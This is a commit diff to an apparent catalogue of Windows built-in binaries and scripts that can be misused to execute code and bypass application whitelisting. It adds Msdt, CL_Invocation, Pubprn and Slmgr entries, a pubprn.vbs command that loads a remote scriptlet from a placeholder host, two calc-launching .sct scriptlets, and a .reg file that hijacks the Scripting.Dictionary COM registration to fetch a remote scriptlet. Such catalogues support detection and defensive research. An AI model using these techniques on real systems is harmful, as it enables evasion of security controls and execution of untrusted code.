Added more in new structure
parent
e4b37b00ef
commit
0eb4ec64e3
|
@ -0,0 +1,29 @@
|
|||
Template
|
||||
|
||||
## Binary.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Example
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Name of guy - @twitterhandle
|
||||
|
||||
Code sample:
|
||||
* [NameOfLink](Payload/NameOfPayload)
|
||||
|
||||
Resources:
|
||||
* https://linktosomethingusefull.com
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\binary.exe
|
||||
```
|
||||
|
||||
Notes:
|
||||
Some specific details about the binary file.
|
||||
|
||||
|
||||
|
|
@ -15,6 +15,7 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
[Installutil.exe](OSBinaries/Installutil.md)
|
||||
[Mavinject32.exe](OSBinaries/Mavinject32.md)
|
||||
[Msbuild.exe](OSBinaries/Msbuild.md)
|
||||
[Msdt.exe](OSBinaries/Msdt.md)
|
||||
[Mshta.exe](OSBinaries/Mshta.md)
|
||||
[Msiexec.exe](OSBinaries/Msiexec.md)
|
||||
[Odbcconf.exe](OSBinaries/Odbcconf.md)
|
||||
|
|
|
@ -5,3 +5,4 @@ If you are missing from the acknowledgement, please let me know (I did not forge
|
|||
|
||||
# OS SCRIPTS
|
||||
|
||||
[Cl_invocation](OSScripts/Cl_invocation.md)
|
|
@ -0,0 +1,15 @@
|
|||
## Msdt.exe
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
Open .diagcab package
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* ?
|
||||
|
||||
Resources:
|
||||
* https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/
|
||||
* https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/
|
||||
|
|
@ -0,0 +1,29 @@
|
|||
## CL_Invocation.ps1
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
. C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
|
||||
SyncInvoke <executable> [args]
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Jimmy - @bohops
|
||||
|
||||
Code sample:
|
||||
|
||||
|
||||
Resources:
|
||||
* https://twitter.com/bohops/status/948548812561436672
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\diagnostics\system\AERO\CL_Invocation.ps1
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,29 @@
|
|||
## Pubprn.vbs
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
pubprn.vbs 127.0.0.1 script:https://domain.com/folder/file.sct
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Matt Nelson - @enigma0x3
|
||||
|
||||
Code sample:
|
||||
* [Pubprn_calc.sct](Payload/Pubprn_calc.sct)
|
||||
|
||||
Resources:
|
||||
* https://enigma0x3.net/2017/08/03/wsh-injection-a-case-study/
|
||||
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
|
||||
|
||||
Full path:
|
||||
```
|
||||
C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||
C:\Windows\SysWOW64\Printing_Admin_Scripts\en-US\pubprn.vbs
|
||||
```
|
||||
|
||||
Notes:
|
||||
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,30 @@
|
|||
## Slmgr.vbs
|
||||
|
||||
* Functions: Execute
|
||||
|
||||
```
|
||||
slmgr.vbs
|
||||
```
|
||||
|
||||
Acknowledgements:
|
||||
* Matt Nelson - @enigma0x3
|
||||
* Casey Smith - @subtee
|
||||
|
||||
Code sample:
|
||||
* [NameOfLink](Payload/NameOfPayload)
|
||||
|
||||
Resources:
|
||||
* https://www.slideshare.net/enigma0x3/windows-operating-system-archaeology
|
||||
* https://www.youtube.com/watch?v=3gz1QmiMhss
|
||||
|
||||
Full path:
|
||||
```
|
||||
c:\windows\system32\slmgr.vbs
|
||||
c:\windows\sysWOW64\slmgr.vbs
|
||||
```
|
||||
|
||||
Notes:
|
||||
Requires registry keys to work.
|
||||
|
||||
|
||||
|
|
@ -0,0 +1,22 @@
|
|||
<?XML version="1.0"?>
|
||||
<scriptlet>
|
||||
|
||||
<registration
|
||||
description="Bandit"
|
||||
progid="Bandit"
|
||||
version="1.00"
|
||||
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
|
||||
remotable="true"
|
||||
>
|
||||
</registration>
|
||||
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
|
||||
|
||||
]]>
|
||||
</script>
|
||||
|
||||
</scriptlet>
|
|
@ -0,0 +1,24 @@
|
|||
Windows Registry Editor Version 5.00
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary]
|
||||
@=""
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\Scripting.Dictionary\CLSID]
|
||||
@="{00000001-0000-0000-0000-0000FEEDACDC}"
|
||||
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}]
|
||||
@="Scripting.Dictionary"
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\InprocServer32]
|
||||
@="C:\\WINDOWS\\system32\\scrobj.dll"
|
||||
"ThreadingModel"="Apartment"
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ProgID]
|
||||
@="Scripting.Dictionary"
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\ScriptletURL]
|
||||
@="https://gist.githubusercontent.com/enigma0x3/4373e9a63aaebe177c747af9bc6da743/raw/2207d8a1a536371aff5f61c8bef8400622868976/wee.png"
|
||||
|
||||
[HKEY_CURRENT_USER\Software\Classes\CLSID\{00000001-0000-0000-0000-0000FEEDACDC}\VersionIndependentProgID]
|
||||
@="Scripting.Dictionary"
|
|
@ -0,0 +1,22 @@
|
|||
<?XML version="1.0"?>
|
||||
<scriptlet>
|
||||
|
||||
<registration
|
||||
description="Scripting.Dictionary"
|
||||
progid="Scripting.Dictionary"
|
||||
version="1"
|
||||
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
|
||||
remotable="true"
|
||||
>
|
||||
</registration>
|
||||
|
||||
<script language="JScript">
|
||||
<![CDATA[
|
||||
|
||||
var r = new ActiveXObject("WScript.Shell").Run("calc.exe");
|
||||
|
||||
|
||||
]]>
|
||||
</script>
|
||||
|
||||
</scriptlet>
|
Loading…
Reference in New Issue